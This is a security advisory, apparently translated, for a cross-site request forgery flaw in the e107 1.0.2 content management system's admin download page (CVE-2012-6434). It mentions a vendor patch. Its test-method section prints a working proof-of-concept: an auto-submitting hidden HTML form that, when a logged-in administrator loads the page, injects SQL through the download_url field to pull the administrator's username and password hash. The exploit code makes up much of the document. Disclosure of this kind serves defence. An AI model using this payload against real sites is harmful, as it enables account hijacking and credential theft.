E107 'e107 _ admin/download. php' Cross-Site Request Forgery Vulnerability

Release date:
Updated on:

Affected Systems:
E107 e107 1.0.2
Description:
--------------------------------------------------------------------------------
Bugtraq id: 57093
CVE (CAN) ID: CVE-2012-6434
 
E107 is a content management system written in php.

E107 1.0.2 and other versions of e1__admin/download. php has multiple CSRF vulnerabilities. Remote attackers can use (1) download_url, (2) download_url_extended, (3) download_author_email, (4) download_author_website, (5) download_image, (6) download_thumb, (7) download_visible, (8) SQL injection attacks with the download_class parameter hijack the Administrator's authentication and perform unauthorized database operations.
 
<* Source: Joshua Renault

Link: http://xforce.iss.net/xforce/xfdb/80902
Http://www.exploit-db.com/exploits/23829/
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
<Html>
<Body onload = "document. formCSRF. submit ();">
<Form method = "POST" name = "formCSRF" action = "http://ww.example.com/e107/e107102/e107_admin/download.php? Create ">
<Input type = "hidden" name = "cat_id" value = "1"/>
<Input type = "hidden" name = "download_category" value = "2"/>
<Input type = "hidden" name = "download_name" value = "adminpassdownload"/>
<Input type = "hidden" name = "download_url" value = "test.txt", (select concat (user_loginname, ':', user_password) from e1__user where user_id = '1'), '', '0', '2', '2', '123 ', '','', '2', '0', '', '0', '0') ---"/>
<Input type = "hidden" name = "download_url_external" value = ""/>
<Input type = "hidden" name = "download_filesize_external" value = ""/>
<Input type = "hidden" name = "download_filesize_unit" value = "KB"/>
<Input type = "hidden" name = "download_author" value = ""/>
<Input type = "hidden" name = "download_author_email" value = ""/>
<Input type = "hidden" name = "download_author_website" value = ""/>
<Input type = "hidden" name = "download_description" value = ""/>
<Input type = "hidden" name = "download_image" value = ""/>
<Input type = "hidden" name = "download_thumb" value = ""/>
<Input type = "hidden" name = "download_datestamp" value = ""/>
<Input type = "hidden" name = "download_active" value = "1"/>
<Input type = "hidden" name = "download_datestamp" value = "10% 2F11% 2f2012 + 02% 3A47% 3A47% 3A28"/>
<Input type = "hidden" name = "download_comment" value = "1"/>
<Input type = "hidden" name = "download_visible" value = "0"/>
<Input type = "hidden" name = "download_class" value = "0"/>
<Input type = "hidden" name = "submit_download" value = "Submit + Download"/>
</Form>
</Body>
</Html>

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
 
E107
----
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
 
Http://e107plugins.co.uk/